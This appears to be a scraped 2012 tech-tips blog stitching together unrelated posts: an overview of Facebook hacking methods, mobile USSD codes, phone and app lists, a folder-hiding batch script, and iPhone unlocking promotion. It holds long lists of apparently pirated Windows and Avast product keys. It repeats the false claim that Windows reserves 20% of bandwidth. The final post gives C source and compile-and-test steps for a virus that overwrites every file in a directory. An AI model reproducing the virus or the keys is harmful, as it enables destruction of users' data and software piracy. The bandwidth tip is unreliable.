Wednesday, November 28, 2012

How Hackers Can Hack / Crack your Facebook Password ?


Hello friends, This is Sanjay i have brought something really special for you as i know most of our users are interested in learning hacking, So i have brought this how to hack an facebook account i have just mentioned the name of the tricks you can google it deeply or you can wait for next post to learn it deeply.

You might be very happy right now because of the availability of high speed Internet, but when you get to encounter hackers, everything seems to become frustrating. Your personal information gets stolen and social media accounts like Facebook get invaded. Hackers are definitely a huge disturbance. They’re not merely robbers, but killers to the connection as well. They can spread viruses that consume a huge part of your bandwidth. They are among the reasons why even a high speed internet becomes sluggish.
If you are curious about how hackers attack your Facebook or other social media accounts apart from the irritation that you feel about them, consider knowing the various techniques that some of them are presently using. If you’re taking a computer course or any IT related subject, you’ll definitely recognize these strategies.

The Keyloggers:
These are among the most basic methods utilized by hackers in stealing your passwords. The keylogger simply dwells in your system memory and activates every startup. It records all the keys you type and creates a log, which will then be forwarded to the person operating it, the hacker. One of the most popular keyloggers is the Ardamax Keylogger. Hence, it is advised to use online virtual keyboard when it comes to accessing your bank or Paypal accounts on the Internet.


The RAT or Remote Administration Tool:
Through RAT, the hacker can connect to your computer without you recognizing it. He can see everything that is on your screen. He can also just watch all the websites that you have been visiting. The RAT actually has a built-in piece that functions like a keylogger. Therefore, it can as well copy all the files from your computer’s hard disk secretly. Poison Ivy is one example of RAT.
The Trojan Horses
There are among the most typical malwares. They are usually acquired from special offerings online. Downloading free software programs, for example, is one common step of getting a Trojan Horse in your system. Trojan Horses are more superior compared to RAT and Keyloggers. They enable plenty of other functions that enhance the hackers’ capability to access your PC. A well-known Trojan Horse if the Turkojan.

The Phishing Method:
Hackers create websites similar to the Facebook homepage with attached system that tracks down all the usernames and passwords entered. All of the log in details will be stored in a particular server, which hackers have access to. Hackers drive people to their fake websites by sending emails indicating that someone has sent a message or tagged a photo of them on Facebook. Some Facebook Apps also leads users to the Phishing site.

Whatever tool hackers are using, it is highly recommended to enable secure browsing. If you normally have high speed internet, you must have your system checked and cleaned right away once the connection becomes slow suddenly. The blame should not be thrown only to the network carrier. Consider other possibilities like hackers trying to get into your PC or viruses that have already started infecting your system
.

Sunday, November 25, 2012

Free Missed Call Alert Services For Idea, Airtel, BSNL, Aircel And Relince

Missed call alert is a service which will inform you about any missed calls even when your mobile is switched of. Sometime we are at important meetings or anywhere where we have to put our mobile switched of then if someone calls you can't know about it but missed call alert service will inform you about that call through message when your phone will be again switched on.

The Tricks:

AIRTEL:
*321*882# :: FOR 3 MONTHS.

AIRCEL:
*62*+919842201006#

IDEA:
*62*+919824001711#

IDEA :
*62*+919891004748#

IDEA:
*62*+919887040012#

IDEA:
*62*+919822001711#

IDEA:
*62*+919847926340#

IDEA:
*62*+919708002800#

BSNL:
*62*17010#

RELIANCE:
*62*+919025000700#

Thursday, November 22, 2012

Increase your internet speed up to 20%


Most of the internet user don't know that Microsoft reserved 20% of your available bandwidth. They reserve this for their own purpose like Windows update and interrogating your PC etc. Today I will tell you how to increase your internet speed up to 20%.


Step 1: Click START menu then RUN and type "gpedit.msc". Don't use quotes ( " " ). This opens the Local Group Policy Editor.

Step 2: Then go to Local computer policy and open Computer Configuration folder.

Step 3: In Computer Configuration open Administrative Templates and then openNetwork.

Step 4: Open QoS Packet Scheduler and double click on Limited reservable bandwidth.

It will say that it is Not Configured, but you will see under Explain tab i.e. By default it reserve 20% of your bandwidth.
You click on Enabled reservable bandwidth then set it to ZERO. This is how you will increase your Internet speed up to 20%.

Windows XP SP3 PRO Genuine product key

MR49R-DRJXX-M6PX2-V96BF-8CKBJ


These are also Genuine product keys
*****************************************
KWTDY-HYHVW-M9TGD-WYBPT-H7HGQ
CB9YB-Q73J8-RKPMH-M2WFT-P4WQJ

Window XP sp2 Product key




Windows XP SP2 Pro Genuine Product Key : DYKRH-48DMG-PHKGY-4329Q-PXGHT



100 Genuine keys for Windows XP Pro Sp2


G8TVB-PD7YR-GTXX8-X6QWJ-T66R8
VTTW8-M24JG-XTCV2-86CKX-H4H28
FYD38-7G2MV-PH8HT-DJ76R-62Q7B
DBW2Y-Q3TCX-V9K4V-H4Q7P-HVV2M
JYXFX-J72W6-WD46Q-KMJX4-TXBVQ
HY3GY-MBTRD-4FQD8-H46R2-8V836
M7KMT-4C48B-VF8FJ-2H7WJ-P2MRJ
CJ9DD-HDFY8-29J6X-9YKK9-FX3FD
RXVVR-X76JB-K29PK-GW2YC-V3K3M
RHF6D-3H64G-4BFVM-DQRCY-RBJDY
HRT73-TJ8K6-P6PYT-4YJ9T-6XT4Q
PWMP8-6R8CP-DRFH4-42QM8-BWFXB
V9BDD-6TC2K-JTMBC-7XGMQ-B6KPG
GD2QT-VGT98-QF4CD-PW7HB-9YJDJ
GWRR2-XDH2X-D7THG-279P4-MRKBD
W9JX2-G8TFB-RBCGG-2K9HQ-BXBW3
HWGW2-6FQ7Y-T93HT-3K2TR-B3FW6
KG79T-9Q2JV-33YG7-PTWX7-YYTDQ
VRTWG-G4D4J-4X6Y9-GBQRD-4P99D
J4VQG-W727H-29CFX-G3C2X-MJG2D
DXMBX-XGQV8-JC2K6-BWGYH-R23RG
V473B-KJWJW-R27HW-DBQ68-W8XGJ
GXYMW-K6J7X-DFVBP-JDVK3-RBYHW
GKJFB-DT3KF-F9PX3-TMMDH-T7Y33
RQ4GC-YG4H3-BDX4H-M7GKG-R4DRG
QRX7R-RK8H6-HP2RY-H8M7M-66XTT
RM6FT-V69M3-3TDDH-YDMY4-KBBT3
H684R-GRB3R-GJ96D-DPC46-CVV8J
TVRRY-F367Q-9X47C-QM7WY-92VFW
MB7XQ-9KRY7-CVF2X-J6VR4-P9DVQ
GMR2Q-9K6P4-VGCF6-BW8RH-7VG86
K39KF-RGB6V-JKD8G-JFTB3-X3CP8
VXDTW-YXKV7-MVVX3-7P7HR-VF88M
Q8F9G-727B6-F74GF-B96HC-44YMG
G4C6K-8TRJ9-2VWPJ-J27DY-MDCWW
KBHQT-RHPYG-TGWTG-93X3C-TGTT3
QC8GW-XHRQ8-HK478-BCH3X-4QHCY
BVM9V-XB8XY-DG76T-GGVBV-2RXHQ
MYCW9-BHFVH-VGMPR-3HXGQ-7YGXT
T8T93-XKJMC-24V98-9RDVH-KMGHY
P6PKY-HGQCG-MQB6H-99TV3-TB3H6
P6T2P-QRVFG-P2MRH-8WDTJ-FP92M
T66DX-34MPR-8H44V-H4XDT-WJ38W
W8FTR-J4D8T-XC6GF-7WPW8-GP866
J996M-VKTQJ-KJY7F-PH2PF-DDD4B
DB7W8-WHF3T-FJ99W-HR69Y-RC2BQ
H8XJF-YCKCF-KTQBX-Q2RXF-BF3QB
J283B-QHV32-TXMPV-DP8GX-6B2PY
V8JM7-HH4TT-CHB87-3VQ8W-YRXFD
T62FM-HGP8H-XK8TT-F36KX-CCMFD
XGP2Q-6Q326-V4MYV-F6QBH-QQ9CB
TQV8J-V6TH6-2XK39-KK6WG-949TJ
MHGJW-YC7PK-CMXKQ-4C2HJ-P7RQ6
XQBCC-CMGWC-W2TC8-2QFX9-93HPJ
PP7GB-K8FKY-DWBXB-JXMH4-6TYP8
BJTQH-29YVT-PF2FF-T78YJ-CQHHD
TTTXH-T99P8-GTB4X-JVJPC-J66RB
V94VC-3QD6G-T4Q2R-P393R-9JCBY
DKXRD-RXBG9-JJCVV-8X6GP-FTC28
F2XK4-MFDR7-PGPDH-VWJDX-Q78YM
MWYMX-MGVKW-F2DD8-KDKPG-VDPR8
XPFXC-GK8YR-P9V9J-68JXJ-7X4VY
V34PG-WGGGV-BX64H-CGQH6-PPCM6
GRHPP-M9RC7-J3FGX-VVWGV-7CHGD
F3K6T-KGR9R-W26MY-3V9MP-YWBFM
D96Y4-K6J4G-YHKD4-9D9T7-FK72B
MMWYT-CPJQQ-JMY2K-D389T-6V4XD
K8XWY-KH2D3-6HHR2-BGDM8-B68X6
D63KC-FYVCB-PJKHD-HVQQY-FM8H6
XM6HB-YY8C3-2D2YR-PR667-G4GB3
GJWG8-KF2F4-MKC3H-8VJ6J-6GJMG
GQWC3-PCJ2T-H2WFB-WC3FB-7R3H8
JH666-7V86C-6J473-47R97-RM496
DHPTG-QQ6DG-RFV8C-VQ248-MJ3HB
KK6GH-HRY9D-VR2YJ-M9CRW-GPCFT
HVKQV-HR3R6-4JQW8-2CR3X-HP7RB
KJPR2-MRR8J-DTFQT-D348R-29KFD
R2BP7-76B4Y-T2D7C-4387Q-MGRWB
RFJPH-6KJ2W-X7D6P-6YKWJ-73GP6
VKF8D-VK649-XRF8P-8JW2F-GQYCJ
KJWKT-8DBGP-47X6X-VQQ4M-3XFT6
TFWQ4-JCPD4-F3GFX-9B69J-BRVTY
QXYMD-FT7VY-GF7PC-Y6W88-B2P6Q
XP9GT-TRJXB-D4BM3-2QVB2-4643Q
D7Q2M-MCGRD-T2RGT-X246R-MDMRJ
KPMWK-GJC88-VPGT4-XJJ7W-TH7T3
KFDTR-4J7VH-KTFJC-2KVF4-YBV2Q
QYP8D-T3RB2-3QVMV-WPCBG-H6RDG
QHCW8-MFF4Y-DF3RG-TBT4K-D8HR6
J7FVW-K6HJD-3TDV9-GDPJ6-HJK8T
QPRM2-3DTMF-JGYJM-QD4KC-D2JGW
GTHT7-X2GQH-24FDP-G2VVR-PMD8W
PD42V-YQY7M-7RMV8-6C8J3-MGBMW
R88VT-JWJB7-KGHM9-GKXHY-RPGWB
QCPJV-FJHTV-DR2JX-VGDGB-CTHHT
QD82X-MQ8P6-HXCP3-46783-43JTW
GCBP7-V664B-QV7PY-XTTBY-WH7HW
KHYWP-KK4FD-Q7B6C-F9JM7-CFVQM
V7GVF-T48C7-CQBW2-QQQWQ-7QXHY
J923C-8T8FV-XGVB6-7JY74-GHBRM

Best Samsung Android Phones

Samsung Android Phones Below Rs10000



Best Samsung Android Phones



 Samsung Galaxy Y S5360

Samsung Android Phones Below Rs10000

2). Samsung Galaxy Y Pro Duos

Samsung Android Phones Below Rs10000

3). Samsung Galaxy Chat B5330

Samsung Android Phones Below Rs10000

4). Samsung Galaxy Ace S5830

Samsung Android Phones Below Rs10000

5). Samsung Galaxy Y DuosS6102

Samsung Android Phones Below Rs10000

How To Check Whether Your Android Phone Is Rooted Or Not


How To Check Whether Your Android Phone is Rooted Or Not

  1. Download Root Checker Basic App From Here.
  2. Install The Application and Open It.
  3. An Screen Will Open Asking Verify Root Access,Click On Verify Root Access.
    How To Check Whether Your Android Phone Is Rooted Or Not
  4. Wait For Few Seconds Then You will get Message On Your Screen Saying Whether Your Android Phone Is Rooted Or Not.How To Check Whether Your Android Phone Is Rooted Or Not
Now You Know Whether Your Android Device Is Rooted Or Not.I think It will Surely Help You and If You get any Problems While Checking Feel Free To Leave a Comment And If you Liked The Post Reward Us With a Stumble.

Best Android Tablet With Calling Facility Under Rs 10000


Android Tablet With Call Facility Under Rs 10000.

1). Micromax Funbook Talk

Tablet With Call Facility

Specification:

Price:Rs 7499
Android Version: Android V4.0 Os
Screen:7-Inch Touch Screen
Processor:1 GHz Cortex-A8
Ram: 512 MB DDR3
Primary Camera:0.3 Mega Pixels
Internal Storage:4GB
Expandable Upto:32 GB

Also Read:How To Root Htc Explorer

2). Penta T-Pad WS703C

Tablet With Call Facility

Specifications:

Price:Rs 6979
Android Version:4.0 OS
Screen:7 Inch Capacitive Touch Screen
Processor:1.2 GHz Cortex A8
Ram:512 MB DDR3
Primary Camera:0.3 Mega Pixel
Internal Memory:4 Gb

3). Zync Z1000

Tablet With Call Facility

Specifications:

Price:Rs 9999
Android Version:4.0 Os
Upgradeable To: 4.1 Jelly Bean OS
Screen:9.7 Inch LCD IPS Display
Processor:1.5 GHz
Ram:1 GB DDr3
Primary Camera:2 Mega Pixels
Secondary Camera:0.3 Mega Pixels
Internal Memory:8 GB
Expandable Upto:32 GB

Also Read:5 Best Samsung Android Phones Under Rs 10000.

4). Adcom Apad 721C Tablet

Tablet With Call Facility

Specifications:

Price:Rs 9250
Android Version:4.0.4 OS
Processor:1.5 GHz Allwinner Cortex A8
Screen:7 Inch Capacitive Touch Screen
Ram:1 GB DDR3
Primary Camera:2 Mega Pixels
Secondary Camera:0.3 Mega Pixels
Internal Memory:4 GB
Expandable Upto:32 GB

5). Zync Z999 Tablet

Tablet With Call Facility

Specifications:

Price: Rs 8990
Android Version:4.0(ICS)
Processor:1.5 GHz
Display:7 Inch Capacitive Touch Screen
Ram:512 MB DDR3
Rom:8 GB
Primary Camera:2 Mega Pixels
Secondary Camera:0.3 Mega Pixels
Battery:4200 mAh Lithium Ion

Top 10 Android Apps 2012


Top 10 Android Apps

1). Avg Antivirus

Top 10 Android Apps 2012
Antivirus Apps For Android Are very Useful And when it comes to Android Avg is one of the most Popular and Most used Apps.Avg Is a Mobile and Pc Security Software Provider.It Provides Real Time and Antitheft Protection To Tablets And Pc’s.
It Protects You From Harmful Viruses,spyware,malware,Text Messages and Helps You In Keeping Your Private Data Safe.Want More Antivirus For Android then Top 5 Antivirus For Android Is For You.

Also Read:How To Root Htc Explorer.

2). Pinterest

Top 10 Android Apps 2012
Pinterest is a Tool to Find Your Inspiration and Share With Others.Pinterest For Android Is A Social Network App That Links Images and Links From Web To Your Board and browse of another or Your Friends.You Can Also Pin With Your Camera.

3). Opera Mini Web Browser

Top 10 Android Apps 2012
Opera Mini Web Browser Is One Of the Best And Fastest Browser For Android Phone.Opera  Mobile Helps You Get More Of Your Online,whether you are finding Information Or Relaxing With Internet.It’s the Ideal Browser To Use On The Fast Network Connections Such As WiFi,3G And 4G.It is Designed To Make Most Of Your Android Device and is worthy To Be Included In the Top 10 Android Apps List.

Also Read:Top 10 Browsers 2012

4). Adobe Photoshop Express

Top 10 Android Apps 2012
Edit And Share Photos Virtually Online.One Of The Best and Renowned Software For Editing Pics Online as Well As Offline.Touch To Crop,Rotate,Adjust Color And Add artistic Effects.Access All Your Photos and Videos From Your Photoshop.com Account.

5). Temple Run

Top 10 Android Apps 2012
The Most Addictive Mega Hit Temple Run Is Now Out For Android.It is One Of The Most Downloaded Apps For Android.You Can Test Your Reflexes As You Run Ancient Temple Walls And Along Sheer Cliffs,Swipe To Turn,Jump And Slide To Avoid Obstacles,Collect Coins and Buy and Buy Power Ups,Unlock New Characters and See How Far You Can Run.

6). What’sApp Messenger

Top 10 Android Apps 2012
Get WhatsApp Messenger And Say Goodbye To SMS.It Is a Smartphone Messenger Available For Android.WhatsApp Uses Your 3G or WiFi To Message Your Friends Or Family.Switch From SMS To WhatsApp To Send and Receive messages,pictures,audio notes and Video Messages.

7). Go Launcher Ex

Top 10 Android Apps 2012
It is The Extended Version Of Go Launcher,One Of The Most popular Home Application.Go Launcher Is The Most Popular Android Home Launcher App Replacement App.It offers you many first ever features to customise your Own Homepage Experience.It Provides you Speedy and Smooth Operations fancy and plentiful themes and Utility functions with imagination.

8). RealPlayer

Top 10 Android Apps 2012
It is The Popular Music For Pc As Well as Android.It Supports 9 Languages.It’s Popular Features Include An Intuitive User Interface,Widgets,Equalizer,Last Fm Scrobbling,Meta Data Editing,Optimised Graphics For High Resolution  Devices So you Can Listen The Music In Your Own Way.

9). Titanium Backup PRO Key ★ root

Extremely Powerful App To Backup All Of Your Apps,Market Links,Remove Bootware & More.It is Voted #1 Top Root App On Twitter.You can Backup,Restore,,freeze(With Pro) Your Apps.This Includes All Protected Apps and System Apps,plus external apps on Your SD Card.You Can Do 0-click batch and scheduled backups.Backup Will Operate Without Loosing Apps.

10).ezPDF Reader PDF

Top 10 Android Apps 2012
 ezPDF Reader is the best Selling ,Best Related And Most Commented PDF Viewer,Annotator and Form Filler.It is Compatible With Compatible Smartphones and Tablets Including Nexus 7.

Facebook Security Tips to Avoid Risk


Facebook is among the worlds biggest and the most popular social networking sites in the world. It has more than 1,000 million users. As The Number Of Users are increasing it is also becoming more hard to Secure Data .
You should keep your private information safe and secure so that no one can misuse it over the web. In this article I am Going To Share Some Facebook Security Tips That Will Help You In surfing Facebook Safely And Will Give You A Better Social Network Experience.

Facebook Security Tips

Avoid Sharing Your Personal Information:

You should avoid sharing your personal information like date of birth, address, mobile no and most importantly user names and passwords. etc. Even if you want to give these information’s then make sure you set your privacy setting in such a way that strangers can’t see your personal information.

Change Profile Privacy Setting:

If you want to be safe and secure on the social networking sites then you should alter the privacy setting in such a manner that no one can misuse your data. On Facebook you are allowed to change he privacy setting, you can select which part of your profile will be seen by whom by changing the privacy setting.

Avoid Click on Every Link:

Habit of clicking on every link can be harmful for you. It can invade your privacy. Avoid click on links like “see who visited your profile”, “See your Facebook or something like these”. These are just the spam links. Facebook don’t track the views on each profile so all these third-party apps are of no use. Avoid clicking on these spam links. You will also get many useless links on your wall, try to avoid click on them.

Enable Login Notification:

Facebook has an amazing feature named as notification feature. This will notify you through mail or text SMS on your phone regarding the log in process. It will tell you the IP address, time and the place from where you account was logged in. When someone tries to log in to your account you will get a notification, which give you some time to take action against that unauthorized sign in process. You can enable the Login notification features by navigating through Account > Account Settings > Account Security you will get an option “Log-in notification feature”.

Enable SSL Encryption:

Few years ago SSL encryption was only used by sites which need high-end security like bank sites, Government agency’s website but now SSL encryption is used to many other sites to make them secure. SSL encryption will help you to be secured while surfing Facebook. Facebook also has the SSL encryption; all you have to do is enable it from your security settings option.

Lock Folder Without Any Software and Password Protection.

                                  

This tutorial will show you how to be able to lock and unlock a folder with a password in Windows  without having to use any 3rd party software.

  1. Open Notepad and copy the below code and save as Locker.bat. 
  2. At first time start it will create folder with Locker automatically for you. 
  3. Don't forget to change your password in the code its shown the place where to type your password.
 After u copy the Commanding go to the bold words (or try using shortcut- CTRL+F and type password to locate the line) u will find this word : password here (Change it with any password u like.) is

:if NOT %pass%== 12345 goto FAIL

//so your password here becomes 12345 .//

After creation of  Locker folder again click on the Locker.bat. It will ask you to press Ythen Locker folder will be disappeared. Again to get it click on Locker.bat. and give your password you will get the folder again.


****************************************************************

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303
09D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%== 12345 goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
 
****************************************************************
 
Note:
 
It not only hides the folder, but hide all files… and try opening it without entering password, it will take you to the control panel. Also, if you want to store files on your Pen-Drive, you can use this script. No Software Required.

In case you delete your Locker file (just in case), then you can make a new one (but with the same password) and open it from that. Alternatively, you can keep this locker file somewhere else, and when you want to open ur folder, only then bring it back to that place. 

How To Access Blocked Web Sites?

This summary is not available. Please click here to view the post.

How to Unlock Iphone

                                    



Can You Unlock iPhone? Unlocking iPhone is an easy process for software geeks but for those plain iPhone users, such is a difficult job to do which is why few experts wanted to share and teach others the right methods of unlocking.  Unlocking is simply enabling the mobile service line of an iPhone device to use other carriers by just making some tweaks on the unit’s software applications.  However, prior can you unlock iPhone, there are still important points to know and locate in an iPhone unit.  The following requirements of unlocking are:

• Determine the type of iPhone model that you now have for such is important in identifying the kind of unlocking software to use.
• When unlocking, ensure that the software used is highly rated and with good comments made by users or else you iPhone will be downloading viruses.
• When searching for unlocking methods in the net, always make a good research about it prior to proceeding with the step by step tutorial.
• Don’t try the hardware manipulation method of unlocking if you’re not well versed with the electronic connections of iPhone unit for it would only cause more problems.

How to Unlock iPhone 4 

Unlocking iPhone schemes are often made by hackers and software experts.  Oftentimes, the company specifically Apple Inc. doesn’t provide the necessary information since it is against their system.  However, there are individuals who often cross the limits knowing that unlocking is legalized according to DMCA or Digital Millennium Copyright Act Ruling in United States and other countries.

The following software installation tempts users wanting can you unlock iPhone:

•    QuickPwn – its latest version is capable to unlock iPhone 3G including all features of Quickpwn old version.  Before running Quickpwn, the need to update for the latest firmware must be done first.  Such installation is available in the net.
•    Unlock.no – is a site that provides iPhone unlocking in 30 minutes only without hardware dismantling.  The procedure will allow connections to Wi-Fi and discloses everything about jailbreaking, troubleshooting and etc.
•    Pwnage – a tool that ables to unlock iphone 3G including previous versions of iphone. However, the tool can’t be used in iPhone’s latest version of firmware re-lock. It can only do partition and manage available space on the iphone and wide features of custom logo settings.
•    Yellowsn0w – an updated version of Dev team’s original software which unlocks and jailbreaks iPhone.  When old versions caused some inefficiency, this latest version runs smoothly.
•    iPhone Unlock Toolkit – has the total solution for iPhone unlocking and enables GPRS & RSS feeds.  What only users are required to do is keeping the phone up to date when using the kit.

unlocking iphone safely 

Due to constant upgrade of Apple’s official system, old unlocking applications are affected and disabled.  However, with this latest software that Apple has not yet pin down, unlocking systems is a no sweat in just a few press and clicks.  The following shows how effective it is:

Step 1: You need to purchase the jailbreak software by visiting the website and pressing the Buy Now icon.
Step 2: After purchase, the password will be sent into your email.
Step 3: Enter the password on the Member Area option to be given approval on the downloading process
Step 4: Download the jailbreak installer
Step 5: Once the installer is downloaded, begin the installation of the jailbreaking software to complete jailbreak the iPhone.
Step 6: A jailbreak iPhone is determined when more features are accessed and more activities can be done on the unit due to Cydia installer and third party apps.

Safety of Jail breaking iPhone 

The question of can you unlock iPhone is very simple to answer for a software assisted by Cydia.  It is the only app offering the easiest route to unlock.

Why don’t you take the quickest unlocking?  Visit: Can You Unlock iPhone Tool Guide

The application offers only 3 basic steps of iPhone unlocking yet offers numerous benefits.

Do you want the application now? Visit: How to Unlock an iPhone 4s

free-activation-keys-for-windows-7 Home


  


J7PYM-6X6FJ-QRKYT-TW4KF-BY7H9
D67PP-QBKVV-6FWDJ-4K2XB-D4684
HQDKC-F3P6D-C9YYM-HRB89-QDBB7
76DX2-7YMCQ-K2WCP-672K2-BK44W
2RG93-6XVFJ-RKHQ7-D2RTT-3FMQT
TT63R-8JGWP-WWT97-R6WQC-4CVWY
YQJX6-D6TRM-VWBM7-PHDJK-YPXJH
Q7J7F-GQHBT-Q42RQ-2F8XV-2WKKM
KH4X7-JY8G7-RCD7G-BYDJW-YTPXH
WYBJ8-8QVP3-24R82-VV2VP-72Q9W
9DP2R-W78GJ-GJBKW-CKR46-H3WYT
CXB7F-WWCM4-BP9V3-2YH43-RK8Y6
W9BYV-K2TB8-4YDJT-QBQWP-KFDHB
WGDJW-B8DYC-WVKX4-6MKF4-B8PK8
2PHXF-9PBDW-D3WWY-CPDKD-XG87V



Tuesday, November 6, 2012

Avast serial key


s/n : A8201912R5472M0423-LDXPDP3E
s/n : B1D1A169-C54F-4379-81DB-BEE7D88D7454
s/n : S6616273M5880M1205-ZBCKNAUK
s/n : W8300036R1400A0005-FYKKYX61


Avast 4 CZ Trial (90ti a 121ti dennĂ­ aktivace)

s/n : S1206799H0204M0005-5C8FPEUS
s/n : S4502407E8503M0905-3RZK6RK6
s/n : S4502407E8503M0905-3RZK6RK6
s/n : W9999999H0303A0803-7DA1EK60
s/n : W9999999H0404A0804-VH5YDCHY

Avast! 4 Home

s/n : W0540113H1400A0505-96Z45M8M
s/n : W0591259H1400A0005-K136PMSC
s/n : S1206799H0204M0005-5C8FPEUS
s/n : S3600075H9640M0705-KJ5H7V6T

Avast! 4 Professional

s/n : C0002700R0000M0001-990MNWCA
s/n : S0269390R0000M0001-NVYTF8LL
s/n : S3603770R6936M0305-BYBMP8MN
s/n : S4005887R1384M0505-R5YXRAJY
s/n : S4805113M4185M0205-5UDU0JU2
s/n : S5909917E9757M0105-YMLMMX5V
s/n : W0488580R0000M0001-0NC3L34U

Avast! Home Edition 4.1.357

Server :

s/n : S1714245H7474M0006-52BV6DZ1
s/n : S4836249H6060M0706-ESA6V5YF

Workstation :

s/n : W0750855H6767M0306-F91X3Z4S
s/n : W8374888H4949M0206-8WKAF7S9

Client :

s/n : C6259109H5050M0806-TPH0X1TN
s/n : C6469681H5959M0706-9UYBN3J1

Avast! OEM Edition 4.1.357

Server :

s/n : S0690647M5959M0206-CVMUYD5H
s/n : S6705757M5757M0706-5H8U1MB8

Workstation :

s/n : W4808147M6363M0606-2TRLL2UP
s/n : W8626353M6868M0806-BPUS1STH

Client :

s/n : C5911226M5858M0906-RFKPT7AZ
s/n : C8295496M6161M0706-3FFY9UXM

Avast! Professional Edition 4.1.357

Server :

s/n : S1204691R6060M0506-JV1BTJZE
s/n : S3136352R5050M0106-55CT1Y8L

Workstation :

s/n : W0097232R7373M0106-AV07MY6Z
s/n : W9224485R7474M0806-HEJ6DCTR

Client :

s/n : C9634792R7676M0606-ADYRJ0E2
s/n : C9696671R5151M0506-RFEYMD0S

Avast! School Edition 4.1.357

Server :

s/n : S4225304E6363M0506-4EAJT54W
s/n : S4983481E7373M0706-JJCYD5KN

Workstation :

s/n : W4841617E6969M0206-KEWA5L7D
s/n : W8412422E5555M0906-2CMM5S1W

Client :

s/n : C3900466E7575M0206-P4LJ6C4Y
s/n : C5156737E6868M0306-9AB2AEXS

Avast 7.70.729

s/n : AS770-A504047-MY6WT6

How create a Compurt Virus

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program. 
#include<stdio.h> #include<io.h> #include<dos.h> #include<dir.h> #include<conio.h> #include<time.h> FILE *virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb ”); if(host==NULL) goto next; x=89088; printf(“Infecting%s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a ; next: { fcloseall(); done=findnext(&ffblk); } } printf(“DONE! (Total Files Infected= %d)”,a); end=clock(); printf(“TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK); getch(); } 
COMPILING METHOD: 
USING BORLAND TC 3.0 (16-BIT): 
1. Load the program in the compiler, press Alt-F9 to compile 
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER) 
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE) 
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT) 
5. Once again follow the STEP 1 & STEP 2 Now the generated EXE File is ready to infect USING BORLAND C 5.5 (32-BIT) : 
1. Compile once,note down the generated EXE file length in bytes 
2. Change the value of X in source code to this length in bytes 
3. Recompile it.The new EXE file is ready to infect 
HOW TO TEST: 
1. Open new empty folder 
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THENEW FOLDER) 
3. Run the virus EXE file there you will see all the files in the current directory get infected. 
4. All the infected files will be ready to reinfect That’s it 
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE